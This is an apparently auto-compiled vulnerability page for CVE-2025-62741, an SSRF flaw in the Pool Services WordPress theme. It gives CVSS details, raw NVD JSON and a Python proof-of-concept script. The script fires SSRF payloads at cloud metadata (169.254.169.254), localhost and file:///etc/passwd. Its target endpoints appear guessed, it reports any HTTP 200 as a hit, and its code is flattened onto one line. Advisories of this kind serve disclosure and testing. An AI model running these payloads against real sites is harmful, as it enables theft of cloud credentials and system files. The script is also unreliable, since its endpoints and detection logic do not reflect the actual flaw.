Security Vulnerability Report
中文
CVE-2025-62741 CVSS 5.4 MEDIUM

CVE-2025-62741

Published: 2026-01-22 17:15:59
Last Modified: 2026-04-27 18:16:27

Description

Server-Side Request Forgery (SSRF) vulnerability in SmartDataSoft Pool Services pool-services allows Server Side Request Forgery.This issue affects Pool Services: from n/a through <= 3.3.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SmartDataSoft Pool Services WordPress主题 <= 3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62741 SSRF PoC for WordPress Pool Services Theme # Target: SmartDataSoft Pool Services WordPress Theme <= 3.3 def check_ssrf(target_url): """ Test for SSRF vulnerability in Pool Services theme The vulnerability allows attackers to induce the server to make arbitrary requests to internal/external resources """ # Common vulnerable endpoints in Pool Services theme endpoints = [ '/wp-content/themes/pool-services/', '/wp-content/themes/pool-services/includes/', ] # SSRF test payload - try to resolve internal DNS or make request ssrf_payloads = [ '?url=http://127.0.0.1', '?url=http://169.254.169.254/latest/meta-data/', '?url=file:///etc/passwd', ] print(f'[*] Testing target: {target_url}') print(f'[*] CVE-2025-62741: SSRF in Pool Services Theme') for endpoint in endpoints: for payload in ssrf_payloads: full_url = target_url + endpoint + payload try: response = requests.get(full_url, timeout=10, allow_redirects=False) print(f'[+] Tested: {full_url}') print(f' Status: {response.status_code}') if 'root:' in response.text or response.status_code == 200: print(f'[!] Potential SSRF detected!') return True except requests.RequestException as e: print(f'[-] Error testing {full_url}: {e}') print('[*] Testing complete') return False if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] check_ssrf(target) else: print('Usage: python cve-2025-62741_ssrf_poc.py <target_url>') print('Example: python cve-2025-62741_ssrf_poc.py http://example.com')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62741", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:59.143", "lastModified": "2026-04-27T18:16:26.563", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in SmartDataSoft Pool Services pool-services allows Server Side Request Forgery.This issue affects Pool Services: from n/a through <= 3.3."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición del lado del servidor (SSRF) en SmartDataSoft Pool Services pool-services permite la falsificación de petición del lado del servidor. Este problema afecta a Pool Services: desde n/a hasta &lt;= 3.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/pool-services/vulnerability/wordpress-pool-services-theme-3-3-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}